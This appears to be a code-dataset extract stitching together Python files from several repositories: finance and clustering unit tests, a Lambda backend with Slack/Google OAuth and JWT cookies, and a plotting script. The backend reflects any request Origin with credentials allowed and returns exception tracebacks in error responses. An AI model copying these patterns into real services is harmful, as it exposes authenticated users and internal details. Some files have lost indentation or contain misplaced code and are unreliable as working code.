` .+.`so-------------------::` .`
``.--` .+``so-----:::::::::-----:-` oys+-.`
`..---..` ./ `ys----::/+++++oo/----:- .:+yhhyo:.`
`.----.`` .: `ys:---::+oyssooo+----::....``` .-+shhyo/-`
``.----.`` .- `yh+++++ooooo+//::----:. `` ` `-/oyhhs+:``
.----.` .. :/::-..`` `-----:--:/+o/ ` .:+ydhy:
.----.` .` `..-----/ssssss+ `. `.:oydhy:
``.----.` ` ``.-:/+os/----:+ysssss+ .- `-/oydhy+:.
``.----.`` `.--:/+ooossssy/----:+osssss+` -- `-+shhhs/-`
`..---..` ```` `-ooooosyys+/::ossoooo+` :- `:oyddyo:.
``.--` /oooosyyyysooosooooo+` /- shs+-`
`+ooooooooooooooooooo+` `+- `
.oooooooooooooooooooo+` .o-
.//////////yyyso+++++` -s-
yys++++++` :s-
oo++++++. /s-
`/++++++.`+o.
./++++++.`oo.
:////+/..so-
./////.:y+-
`////-/y+-
://-+y+-
./:oy+-
`/sy/-
oy/-
//-
`--. `-
-dd/
-dd/`-:-` `.----.` `..``---` `---``..
-ddysyhdy: :sooooys: /yyossss/ -sysoosyy`
-ddy` `ydh` ..---:sys /yy+` `` `yyo` `syy`
-dd+ odd. .oyyo++yyy /yy. .yy/ +yy`
-ddy``.hdh /yy: `yyy /yy. `yys```syy`
-hhsyyhhy- .sys++osyy /yy. -syyossyy`
`..``--. ..-. ... `.. .-. +yy`
+yy`
`..
"""
start()
``` |
{
"source": "johnvorsten/Finance-Calculator",
"score": 3
} |
#### File: Finance-Calculator/finance-graph/finance_graphing_test.py
```python
import datetime, unittest, re
# Third party imports
import numpy as np
# Local imports
from finance_graphing import (create_transaction_objects, Income,
plot_integral, calculate_gradients)
#%%
class Testing(unittest.TestCase):
def test_gradients_values(self):
# 10 dollars a day
inc1 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365, datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# Calculate gradients over days
start_date = datetime.date(2020,1,1)
end_date = datetime.date(2020,1,5)
incomes = [inc1, inc2]
gradients, values = calculate_gradients(incomes, start_date, end_date)
"""Gradients should look like this
array([[[ 10., 10., 10., 10., 10., 10., 10., 10., 10., 10., 10.]],
[[-10., -10., -10., -10., -10., -10., -10., -10., -10., -10., -10.]],
[[ 10., 10., 10., 10., 10., 10., 10., 10., 10., 10., 10.]],
[[ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]]])"""
test_gradient =np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[-10., -10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[ 0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]])
test_values = np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]]])
self.assertTrue(np.array_equal(gradients, test_gradient))
self.assertTrue(np.array_equal(values, test_values))
return None
def test_dates(self):
# 10 dollars a day
inc1 = Income(10, 1/365,
datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365,
datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# A range of dates should not be an issue
self.assertTrue(inc1.start_date == datetime.date(2020,1,1))
self.assertTrue(inc1.end_date == datetime.date(2020,1,5))
# One-time expenses should span multiple days even if they occur on one day
# This is because a gradient needs to be calculated between days
self.assertTrue(inc2.start_date == datetime.date(2020,1,2))
self.assertTrue(inc2.end_date == datetime.date(2020,1,3))
return None
def test_income_gradient(self):
# 10 dollars a day
inc1 = Income(10, 1/365,
datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365,
datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# Test gradient
gradient1 = inc1.calc_derivative()
gradient2 = inc2.calc_derivative()
self.assertTrue(np.array_equal(gradient1, np.array([float(10)] * 11)))
self.assertTrue(np.array_equal(gradient2, np.array([float(-20)] * 11)))
return None
def test_calc_gradients(self):
# 10 dollars a day
inc1 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5))
# Single 10 dollar expense
inc2 = Income(-20, 1/365,
datetime.date(2020,1,2), datetime.date(2020,1,2), one_time=True)
# Test gradient
start_date = datetime.date(2020,1,1)
end_date = datetime.date(2020,1,5)
gradients1, values1 = calculate_gradients([inc1,inc2], start_date, end_date)
gradients_test1=np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.,-10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]])
values_test1=np.array([[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]]])
# Test gradient
start_date = datetime.date(2019,12,31)
end_date = datetime.date(2020,1,3)
gradients2, values2 = calculate_gradients([inc1,inc2], start_date, end_date)
gradients_test2=np.array([[
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]])
values_test2=np.array([[
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]],
[[10.,10.,10.,10.,10.,10.,10.,10.,10.,10.,10.]]])
self.assertTrue(np.array_equal(gradients1, gradients_test1))
self.assertTrue(np.array_equal(values1, values_test1))
self.assertTrue(np.array_equal(gradients2, gradients_test2))
self.assertTrue(np.array_equal(values2, values_test2))
return None
def test_income_probability(self):
# 10 dollars a day
inc1 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5))
# Confirm the default probability
a = np.array([1. , 0.9, 0.8, 0.7, 0.6, 0.5,0.4,0.3, 0.2, 0.1,0.])
self.assertTrue(np.array_equal(inc1.probability, a))
# Confirm custom probability
probability=[1,0.98,0.9,0.85,0.8,0.75,0.70,0.68,0.65,0.5,0.45]
inc2 = Income(10, 1/365, datetime.date(2020,1,1), datetime.date(2020,1,5),
probability=probability)
self.assertTrue(np.array_equal(inc2.probability, probability))
return None
def test_best_worst_case(self):
# Income of $100 to $50 over 10 days
period = 10/365
start_date=datetime.date(2020,1,1)
end_date=datetime.date(2020,1,2)
best_case = 100
worst_case = 50
inc1 = Income(income=100, period=period,
start_date=start_date, end_date=end_date,
best_case=best_case, worst_case=worst_case)
daily_gradient = inc1.calc_derivative()
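# Expected value interpolates linearly between worst and best case, weighted by
# the probability curve, before being spread over the period (in days) below.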
value = (best_case - worst_case) * inc1.probability + worst_case
daily_gradient_test = value / (period * 365)
self.assertTrue(np.array_equal(daily_gradient,daily_gradient_test))
return None
def test_regex_match(self):
"""# TODO
This regex is weak. Lots of the test cases will output odd numbers.
I would have to test for lots of conditionals like
If more than (2) '.' appear in the string sequence
A number shouldn't be represented like 2.334.05 (other countries maybe?)
If numbers are interrupted by characters other than ',' or '.'
This is not a valid number : 24A33.05
Even or odd numbers
This is negative : (5.45)
This is negative : -5.45
This is something : -(5.45)
This is positive : 5.45
This is positive : +5.45
Is the data formatted where 5.45 is a transaction out of account or into
account?
This is transaction out of account : -5.45
Or is this? : 5.45
"""
reg = re.compile('[^0-9.-]')
s1 = 'name ni4nvi $03,200.40'
s2 = '(-$32,43.22)'
s3 = '$4,300.00'
s4 = '-$4,300.00'
s5 = '+3i2nndfs!@#$%^&*()2.jnfinn%55'
s6 = '#4,304'
s7 = '#4.334455.0040'
s8 = ''
s9 = ''
s10 = ''
test_case = [s1,s2,s3,s4,s5,s6,s7,s8,s9,s10]
for test in test_case:
result = re.sub(reg, '', test)
print(result)
return None
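
# A hedged sketch of a stricter money-string parser, referenced from the
# test_regex_match docstring above. It is illustrative only, is not used by the
# tests, and the pattern and helper name are assumptions rather than part of
# the original project.
_MONEY_RE = re.compile(r'^\(?[+-]?\$?\d{1,3}(?:,\d{3})*(?:\.\d+)?\)?$')

def _parse_money(text):
    """Return a float for values like '$4,300.00', '-$4,300.00' or '(5.45)'.

    Raises ValueError for malformed input such as '24A33.05' or '2.334.05'.
    Parenthesised or '-' prefixed values are treated as negative (outflows).
    """
    text = text.strip()
    if not _MONEY_RE.match(text):
        raise ValueError('Not a recognised money value: %r' % text)
    negative = text.startswith('-') or text.startswith('(')
    # Strip everything except digits and the decimal point before converting
    value = float(re.sub(r'[^0-9.]', '', text))
    return -value if negative else value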
if __name__ == '__main__':
unittest.main()
"""
~~ Order Filtering ~~
Domain acts as a mask over each pixel of x
For every non-zero element in the mask of x, a list is constructed
The list is sorted, and the 'rank' element from the list is selected
from scipy import signal
x = np.arange(25).reshape(5, 5)
domain = np.identity(3)
signal.order_filter(x, domain, 0)
signal.order_filter(x, domain, 1)
signal.order_filter(x, domain, 2)
Example 1
rank = 1
domain = [[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]]
x = [[ 0, 1, 2, 3, 4],
[ 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14],
[15, 16, 17, 18, 19],
[20, 21, 22, 23, 24]]
For element [0,0] the domain mask is centered, and the non-masked elements
are [0,0,6] (elements are zero when the mask is off of x).
Since rank is 1, the 1st element from the list is selected (0).
For element [1,2] the domain mask is centered, and the non-masked elements
are [1,7,13].
Since rank is 1, the 1st element from the list is selected (7).
~~ Median filter ~~
Same idea as above, but the median of the list is chosen
from scipy import signal
x = np.arange(25).reshape(5, 5)
kernel_size = 3
signal.medfilt(x, kernel_size=kernel_size)
Element [1,0]
Elements in list are [0, 0, 0, 0, 1, 5, 6, 10, 11]
The median of the list is 1
"""
``` |
{
"source": "johnvorsten/py_cindex",
"score": 3
} |
#### File: src/tests/c_index_R_interface_test.py
```python
import unittest
# Third party imports
import numpy as np
from sklearn.datasets import make_blobs
# Local imports
from c_index.c_index import (
calc_c_index, simple_cluster_points)
from c_index.c_index_R_interface import (
calc_c_index_clusterCrit,
calc_c_index_clusterSim)
#%%
class Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
"""Generate some dummy data for testing
X is an (nxm) array where n is the number of data points and m is
the feature space of each data point"""
super(Test, self).__init__(*args, **kwargs)
# Generate some data
xs = np.array([[1,2,1.5,1.75,1.33,0.88],
[5,5.5,4.88,6.33,5.01,4.95]]) # Cluster 1, 2 x values
ys = np.array([[8.9,8.5,7.89,8.25,8.85,8.29],
[1.25,1.14,1.85,0.85,0.79,0.96]]) # Cluster 1,2 y values
self.X = np.stack((xs.ravel(),ys.ravel()), axis=1)
# True labels for points in X
self.cluster_labels = np.array([0,0,0,0,0,0,1,1,1,1,1,1])
return None
def test_calc_cindex_clusterCrit(self):
X = self.X
cluster_labels = self.cluster_labels + 1
# Calculate Cindex from clusterCrit package...
res = calc_c_index_clusterCrit(X, cluster_labels)
cindex = res['c_index'][0]
self.assertTrue(isinstance(cindex, float))
return None
def test_calc_cindex_clusterSim(self):
cluster_labels = self.cluster_labels + 1
# Calculate Cindex from clusterSim package...
cindex = calc_c_index_clusterSim(self.X, cluster_labels)
self.assertTrue(isinstance(cindex, float))
return None
if __name__ == '__main__':
unittest.main()
#%% Example 1
def example_1():
import matplotlib.pyplot as plt
# Generate some data
xs = np.array([[1,2,1.5,1.75,1.33,0.88],
[5,5.5,4.88,6.33,5.01,4.95]]) # Cluster 1, 2 x values
ys = np.array([[8.9,8.5,7.89,8.25,8.85,8.29],
[1.25,1.14,1.85,0.85,0.79,0.96]]) # Cluster 1,2 y values
X = np.stack((xs.ravel(),ys.ravel()), axis=1)
# Plot data
fig1= plt.figure(1)
ax = fig1.add_subplot(111)
ax.scatter(X[:,0], X[:,1])
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_title('Points')
# Calculate C Index
cindicies_py = []
cindices_clusterSim = []
cindices_clusterCrit = []
clusters = np.arange(2,6)
for n_clusters in clusters:
# Cluster data points
cluster_labels = simple_cluster_points(X, n_clusters, clusterer='kmeans')
# Calculate Cindex for varying number of clusters ('correct' implementation)
cindex = calc_c_index(X, cluster_labels)
cindicies_py.append(cindex)
# Calculate Cindex from clusterCrit package...
res = calc_c_index_clusterCrit(X, cluster_labels)
cindex = res['c_index']
cindices_clusterCrit.append(cindex)
# Calculate Cindex from clusterSim package...
cindex = calc_c_index_clusterSim(X, cluster_labels)
cindices_clusterSim.append(cindex)
# Plot C index
fig2 = plt.figure(2)
ax = fig2.add_subplot(111)
ax.plot(clusters, cindicies_py, label='Python Implementation')
ax.plot(clusters, cindices_clusterSim, label='clusterSim Package')
ax.plot(clusters, cindices_clusterCrit, label='clusterCrit Package')
ax.set_xlabel('Number of clusters')
ax.set_ylabel('C Index')
ax.set_title('C Index')
ax.legend()
return None
#%% Example 2
def example_2():
import matplotlib.pyplot as plt
# Generate some data
X, labels = make_blobs(n_samples=50, n_features=2, centers=5, cluster_std=1)
# Plot data
fig1= plt.figure(1)
ax = fig1.add_subplot(111)
ax.scatter(X[:,0], X[:,1])
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_title('Points')
# Calculate C Index
cindicies_py = []
cindices_clusterSim = []
cindices_clusterCrit = []
clusters = np.arange(2,6)
for n_clusters in clusters:
# Cluster data points
cluster_labels = simple_cluster_points(X, n_clusters, clusterer='kmeans')
# Calculate Cindex for varying number of clusters ('correct' implementation)
cindex = calc_c_index(X, cluster_labels)
cindicies_py.append(cindex)
# Calculate Cindex from clusterCrit package...
res = calc_c_index_clusterCrit(X, cluster_labels)
cindex = res['c_index']
cindices_clusterCrit.append(cindex)
# Calculate Cindex from clusterSim package...
cindex = calc_c_index_clusterSim(X, cluster_labels)
cindices_clusterSim.append(cindex)
# Plot C index
fig2 = plt.figure(2)
ax = fig2.add_subplot(111)
ax.plot(clusters, cindicies_py, label='Python Implementation')
ax.plot(clusters, cindices_clusterSim, label='clusterSim Package')
ax.plot(clusters, cindices_clusterCrit, label='clusterCrit Package')
ax.set_xlabel('Number of clusters')
ax.set_ylabel('C Index')
ax.set_title('C Index')
ax.legend()
return None
``` |
{
"source": "johnw188/watercoolerRoulette",
"score": 3
} |
#### File: backend/lambdae/auth_test.py
```python
import lambdae.auth as auth
import lambdae.jwt_tokens as tokens
TEST_CODE = "123456"
def fake_oauth_result(code: str):
assert code == TEST_CODE
return dict(
group_id="FAKETEAMID",
user_id="FAKEUSERID",
username="FAKEUSERNAME",
teamname="FAKETEAMNAME",
url="https://fake.fake",
avatar="http://placeholder.com/192x192",
email="<EMAIL>"
)
def test_auth_slack():
result = auth.slack_oauth(
{"queryStringParameters": {"code": TEST_CODE}},
{},
slack_oauth_call=fake_oauth_result) # Mocks out the actual oauth work
assert result["statusCode"] == 302
headers = result["headers"]
assert headers["Location"] == auth.AFTER_AUTH_REDIRECT
cookie = headers["Set-Cookie"]
# This tests both that the issued cookie is valid, and that the user entry was made
tokens.require_authorization({"headers": {"Cookie": cookie}})
def test_auth_google():
result = auth.google_oauth(
{"queryStringParameters": {"code": TEST_CODE}},
{},
google_oauth_call=fake_oauth_result) # Mocks out the actual oauth work
assert result["statusCode"] == 302
headers = result["headers"]
assert headers["Location"] == auth.AFTER_AUTH_REDIRECT
cookie = headers["Set-Cookie"]
# This tests both that the issued cookie is valid, and that the user entry was made
tokens.require_authorization({"headers": {"Cookie": cookie}})
def test_error_param():
# If the oauth gets a query param of error, it indicates
# the slack oauth failed for some reason, and we should 403
def not_callable(code: str):
raise AssertionError("Unreachable")
result = auth.slack_oauth({
"queryStringParameters": {"error": "Anything"}
}, {}, slack_oauth_call=not_callable)
assert result["statusCode"] == 403
```
#### File: backend/lambdae/jwt_tokens_test.py
```python
from http import cookies
import time
import pytest
import lambdae.shared as shared
import lambdae.models as models
import lambdae.models_testlib as models_testlib
import lambdae.jwt_tokens as tokens
def test_jwt_encoding():
to_encode = {"bar": "baz"}
encoded = tokens.jwt_encode(to_encode)
decoded = tokens.jwt_decode(encoded)
assert decoded == to_encode
def test_get_jwt_cookie():
group_id = "foobarbaz"
user = models_testlib.create_fake_user(group_id)
cookie = tokens.get_jwt_cookie(user)
assert cookie.startswith("token="), cookie
auth_cookie = cookies.SimpleCookie()
auth_cookie.load(cookie)
value = auth_cookie[shared.COOKIE_ATTR_NAME].value
decoded = tokens.jwt_decode(value)
assert decoded["group_id"] == user.group_id
assert decoded["user_id"] == user.user_id
def test_require_authorization():
group_id = "foobarbaz"
user = models_testlib.create_fake_user(group_id)
user.delete()
cookie = tokens.get_jwt_cookie(user)
fake_aws_events = {"headers": {"Cookie": cookie}}
# User not saved yet, so should fail to get
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
user.save()
tokens.require_authorization(fake_aws_events)
def test_require_authorization_fail1():
# Non-existant
fake_aws_events = {"headers": {}}
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
def test_require_authorization_fail2():
# Malformed
fake_aws_events = {"headers": {"Cookie": "hella-malformed"}}
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
def test_require_authorization_fail3():
# invalid
fake_aws_events = {"headers": {"Cookie": "token=def_invalid"}}
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
def test_require_authorization_expired():
# temporal expiration
token = tokens.jwt_issue(group_id="group", user_id="user", t=time.time() - tokens.TOKEN_EXPIRY.total_seconds() - 1)
fake_aws_events = {"headers": {"Cookie": "token=" + token}}
with pytest.raises(shared.AuthException) as e:
tokens.require_authorization(fake_aws_events)
assert "Token is expired" in str(e)
```
#### File: backend/lambdae/models_testlib.py
```python
import random
import os
import lambdae.models as models
def random_hex(rand: random.Random, length=6):
    # Use the provided (possibly seeded) Random instance rather than the
    # module-level functions, and honour the requested length instead of a
    # hard-coded 6
    result = ""
    for _ in range(length):
        result += rand.choice('0123456789abcdef')
    return result
def create_fake_users(group_id: str, number: int, seed=None, prefix="fake_user_") -> [models.UsersModel]:
my_random = random.Random(seed)
users = []
for _ in range(number):
user_id = prefix + random_hex(my_random)
user = models.UsersModel(
group_id=group_id,
user_id=user_id,
username="username_" + user_id,
teamname="faketeam_" + group_id,
url="notreal.slack.com",
email="an_email_for_sure",
avatar="http://placeholder.com/192x192"
)
user.save()
users.append(user)
return tuple(users)
def create_fake_user(group_id: str):
return create_fake_users(group_id, 1)[0]
def clear_tables():
assert "IS_LOCAL" in os.environ
deleted = 0
for entry in models.UsersModel.scan():
entry.delete()
deleted += 1
for entry in models.MatchesModel.scan():
entry.delete()
deleted += 1
print("Deleted %i records" % deleted)
```
#### File: backend/lambdae/presence.py
```python
import time
import json
def endpoint(event, context):
# TODO: Update presense time here
response = {
"statusCode": 200,
"body": json.dumps({"message": str(time.time())})
}
return response
```
#### File: backend/lambdae/shared.py
```python
import datetime
import functools
import os
import json
import traceback
COOKIE_ATTR_NAME = "token"
def cookie_format(body: str, expiry: datetime.datetime):
cookie_parts = (
COOKIE_ATTR_NAME + "=" + body,
"Domain=.watercooler.express",
expiry.strftime("expires=%a, %d %b %Y %H:%M:%S GMT"),
"SameSite=None",
"Secure")
return "; ".join(cookie_parts)
def get_expired_cookie() -> str:
return cookie_format("", datetime.datetime(1970, 1, 1))
def get_env_var(name: str) -> str:
value = os.environ.get(name, None)
assert value is not None, "Expected the environment variable \"{}\" to be set.".format(name)
return value
def _fmt_exception(e: Exception) -> str:
return str(e) + "\n" + traceback.format_exc()
class AuthException(Exception):
pass
def get_header(headers: dict, keyname: str, default: str) -> str:
"""
This function deals with the inconsistent casing of http headers :(
A fine example of why we can't have nice things
"""
for k, v in headers.items():
if k.lower() == keyname.lower():
return v
return default
def json_request(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
event, context = args
print("Request to " + str(f.__name__) + ":\n" + json.dumps(event, indent=2))
request_headers = event.get("headers", {})
try:
response = f(*args, **kwargs)
except AuthException:
response = {
"statusCode": 401,
"headers": {"Set-Cookie": get_expired_cookie()},
"body": json.dumps({"ok": False, "message": "User is not logged in"})}
except Exception as e:
print("Unhandled Exception!!!")
print(_fmt_exception(e))
response = {
"statusCode": 500,
"body": json.dumps({
"ok": False,
# TODO DISABLE/Remove in prod? Idk
"message": _fmt_exception(e)
})}
# Remember to encode your bodies kids
if "body" in response:
assert type(response["body"]) == str
# Patch any headers added with the appropriate stuffs
headers = response.get("headers", {})
headers.update({
# Look at this filthy hack
"Access-Control-Allow-Origin": get_header(request_headers, "Origin", "*"),
"Access-Control-Allow-Credentials": True,
"Content-Type": "application/json"
})
response["headers"] = headers
print("Response:\n" + json.dumps(response, indent=2))
return response
return wrapper
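
# Minimal usage sketch (illustrative only; the handler name below is an
# assumption, not part of this module): wrapping a Lambda handler with
# @json_request gives it consistent CORS headers, JSON error bodies for
# unhandled exceptions, and a 401 plus expired cookie for AuthException.
#
#   @json_request
#   def example_handler(event, context):
#       return json_success_response({"message": "hello"})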
def json_response(j: dict, code: int, ok: bool):
to_send = {"ok": ok}
to_send.update(j)
return {
"statusCode": code,
"headers": {"Content-Type": "application/json"},
"body": json.dumps(to_send)}
def json_success_response(j: dict) -> dict:
return json_response(j, 200, True)
def json_error_response(*, message: str, code: int, j: dict = {}) -> dict:
to_send = {"message": message}
to_send.update(j)
return json_response(to_send, code, False)
def json_response_from_exception(e: Exception, code: int = 500):
# json_error_response takes keyword-only arguments, and the result must be returned
return json_error_response(message=_fmt_exception(e), code=code)
``` |
{
"source": "johnwaldron-tcd/codemark-synoptic-visualisation-graph-generator",
"score": 3
} |
#### File: johnwaldron-tcd/codemark-synoptic-visualisation-graph-generator/plot_graphs.py
```python
import os
import numpy as np
import matplotlib.pyplot as plt
import defs
# Make sure we only use Type 1 fonts:
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
plt.rc('axes', labelsize=defs.GRAPH_LABEL_SIZE)
def read_assignment_sim_all(basename):
'''
Read the similarity data from one file and group by assignment.
So return a dict, mapping assignment to list of sim values,
for all students doing that assignment (vs all other students).
'''
inpath = os.path.join(defs.RESULTS_DIR, basename+defs.DATA_SUFFIX)
sims = {a: [] for a in defs.assignments}
with open(inpath, 'r') as fh:
for line in fh:
s1, a1, s2, a2, sim = line.strip().replace('-', ' ').split()
if a1 == a2 and s1 != s2: # Comparison within one project
sims[a1].append(int(sim))
return sims
def read_assignment_sim_max(basename):
'''
Read the similarity data from one file and group by assignment.
We want the max sim values for each student.
Return a dict, mapping assignment to list of (max) sim values.
'''
inpath = os.path.join(defs.RESULTS_DIR, basename+defs.DATA_SUFFIX)
sims = {a: {} for a in defs.assignments}
with open(inpath, 'r') as fh:
for line in fh:
s1, a1, s2, a2, sim = line.strip().replace('-', ' ').split()
if a1 == a2 and s1 != s2: # Comparison within one project
if s1 not in sims[a1]:
sims[a1][s1] = -1
sims[a1][s1] = max(sims[a1][s1], int(sim))
return {a: list(sims[a].values()) for a in defs.assignments}
# #####################################################################
# Violin Plots
# #####################################################################
def _adjacent_values(vals, q1, q3):
'''Outliers: return the bounds for +/- 1.5 times the IQR'''
upper_adjacent_value = q3 + (q3 - q1) * 1.5
upper_adjacent_value = np.clip(upper_adjacent_value, q3, vals[-1])
lower_adjacent_value = q1 - (q3 - q1) * 1.5
lower_adjacent_value = np.clip(lower_adjacent_value, vals[0], q1)
return lower_adjacent_value, upper_adjacent_value
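# Worked example for _adjacent_values above (illustrative numbers only):
# with sorted vals spanning 1..20, q1 = 5 and q3 = 10, the IQR is 5, so the
# candidate whiskers are 5 - 7.5 = -2.5 and 10 + 7.5 = 17.5; clipping gives
# a lower whisker of 1 (the smallest value) and an upper whisker of 17.5.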
def plot_one_violin(ax, sims, metric, proc):
'''
Violin plots showing similarities for each project.
For each violin, show dot for median, bar for the IQR (Q1 to Q3),
and whiskers for 1.5*IQR.
'''
data = [sims[a] for a in defs.assignments]
parts = ax.violinplot(data, showmeans=False, showmedians=False,
showextrema=False)
# Set the colours for the violin plots:
for pc in parts['bodies']:
pc.set_facecolor('#4f90d9')
pc.set_edgecolor('black')
pc.set_alpha(1)
# Do the quartiles:
triples = [np.percentile(d, [25, 50, 75]) for d in data]
quartile1, medians, quartile3 = [t for t in zip(*triples)]
# Compute the whisker bounds (1.5 * IQR beyond the quartiles), clipped to the data range:
whiskers = np.array([
_adjacent_values(sorted_array, q1, q3)
for sorted_array, q1, q3 in zip(data, quartile1, quartile3)])
whiskersMin, whiskersMax = whiskers[:, 0], whiskers[:, 1]
# Now draw the median, IQR and whiskers:
inds = np.arange(1, len(medians) + 1)
ax.scatter(inds, medians, marker='o', color='white', s=30, zorder=3)
ax.vlines(inds, quartile1, quartile3, color='k', linestyle='-', lw=5)
ax.vlines(inds, whiskersMin, whiskersMax, color='k', linestyle='-', lw=1)
# set style for the axes
ax.set_title('Version = \\textbf{{{}}}, '.format(proc) +
'similarity method = \\textbf{{{}}}'.format(metric))
ax.set_xlabel('Assignments')
ax.set_xticks(range(1, 1+len(defs.assignments)))
# ax.set_xticklabels([''] + [p.replace('.v', '').replace('_', '\\_')
# for p in defs.assignments], rotation=45)
ax.set_ylabel('Percentage similarity')
ax.set_ylim(0, 100)
ax.yaxis.grid(True, linestyle='--', which='major', color='grey', alpha=.25)
def plot_assignment_sims(versus_all, save_to_file):
'''
Plot all the violin plots (all metrics/processes) in a single figure.
Each subfigure has a violin plot for each assignment.
Can do all sims per assignment, or just the max sim for each student.
'''
fig, ax = plt.subplots(nrows=len(defs.ALL_METRICS),
ncols=len(defs.ALL_PROCESS),
figsize=(20, 15), sharey=True)
#fig.tight_layout()
plt.subplots_adjust(hspace=0.3)
plt.rc('axes', labelsize=defs.GRAPH_LABEL_SIZE)
for i, metric in enumerate(defs.ALL_METRICS):
for j, proc in enumerate(defs.ALL_PROCESS):
basename = metric + defs.FILENAME_SEP + proc
if versus_all:
sims = read_assignment_sim_all(basename)
else: # Only want max sim value for each student:
sims = read_assignment_sim_max(basename)
plot_one_violin(ax[i][j], sims, metric, proc)
if save_to_file:
#fig.set_size_inches(12, 6, forward=True)
basename = defs.FILENAME_SEP.join(['violin',
'all' if versus_all else 'max'])
outfile = os.path.join(defs.GRAPHS_DIR, basename + defs.GRAPHS_SUFFIX)
plt.savefig(outfile, bbox_inches='tight', pad_inches=0)
print(' Violin plots written to {}'.format(basename))
else:
plt.show()
# #####################################################################
# Silhouette Code
# #####################################################################
def read_diff_totals(basename, pnum):
'''
Read the similarity data from one file and group by point & cluster.
Here we assume: point=(assignment, student) and cluster=assignment.
For each (assignment, student), collect the total diffs per cluster.
Return an map of the difference totals, this looks like
(assignment, student) -> list-of-diffs-per-assignment
'''
# Prepare map to hold diff totals per cluster:
totals = {a: {} for a in defs.assignments}
# Now read in the data and fill up the totals array:
inpath = os.path.join(defs.RESULTS_DIR, basename+defs.DATA_SUFFIX)
with open(inpath, 'r') as fh:
for line in fh:
s1, a1, s2, a2, sim = line.strip().replace('-', ' ').split()
if s1 == s2: # always ignore self-self comparison
continue
if s1 not in totals[a1]:
totals[a1][s1] = [0] * len(defs.assignments)
# File has percent similarity, we want difference, so:
diff = 100 - int(sim)
totals[a1][s1][pnum[a2]] += diff
return totals
def calc_assignment_silhouette(totals, pnum):
'''
Calculate the silhouette value for each point=(assignment, student).
Given totals, mapping assign x student x assign -> diff
See: https://en.wikipedia.org/wiki/Silhouette_(clustering)
Return the values in an np.array, shape = #assignments, #students
'''
attempts = defs.did_assignment()
silhouette = {p: {} for p in defs.assignments}
for a in defs.assignments:
for s in defs.students:
if s not in totals[a]: # student didn't do this assignment
continue
oth_totals = totals[a][s].copy()
# a(i) value is the average for a's cluster:
own_total = oth_totals.pop(pnum[a])
own_average = own_total / (attempts[a] - 1)
# b(i) value is min average for all other clusters:
oth_average = min([t/attempts[a] for t in oth_totals])
# s(i) = (b(i) - a(i)) / max((a(i), b(i)))
silhouette[a][s] = ((oth_average - own_average)
/ max(own_average, oth_average))
return silhouette
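# Worked example of the silhouette formula above (illustrative numbers only):
# if a student's average difference to peers on their own assignment is
# a(i) = 10 and the smallest average difference to any other assignment is
# b(i) = 30, then s(i) = (b(i) - a(i)) / max(a(i), b(i)) = (30 - 10) / 30 ≈ 0.67,
# i.e. the submission sits comfortably inside its own assignment's cluster.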
def print_silhouette(silhouette):
'''
Print the silhouette value for each (assignment, student) point
and then print the average silhouette value for each assignment.
'''
cluster_sil = {a: 0 for a in defs.assignments}
for a in defs.assignments:
print()
for s in defs.students:
if s in silhouette[a]:
print('\t', a, s, '%.2f' % silhouette[a][s])
    pavg = sum(silhouette[a].values()) / len(silhouette[a].values())
    cluster_sil[a] = pavg
    print('=== Average for cluster {}: {:+.2f}'.format(a, pavg))
print(cluster_sil)
def calc_silhouette():
# Number the assignments and students:
num_assignments = len(defs.assignments)
pnum = dict(zip(defs.assignments, range(num_assignments)))
for metric in defs.ALL_METRICS:
for proc in defs.ALL_PROCESS:
basename = metric + defs.FILENAME_SEP + proc
totals = read_diff_totals(basename, pnum)
silhouette = calc_assignment_silhouette(totals, pnum)
print('{:15s}'.format(basename), end=' ')
for a in defs.assignments:
aavg = (sum(silhouette[a].values()) /
len(silhouette[a].values()))
print('{:+.2f}'.format(aavg), end=' ')
print()
function = 1
if __name__ == '__main__':
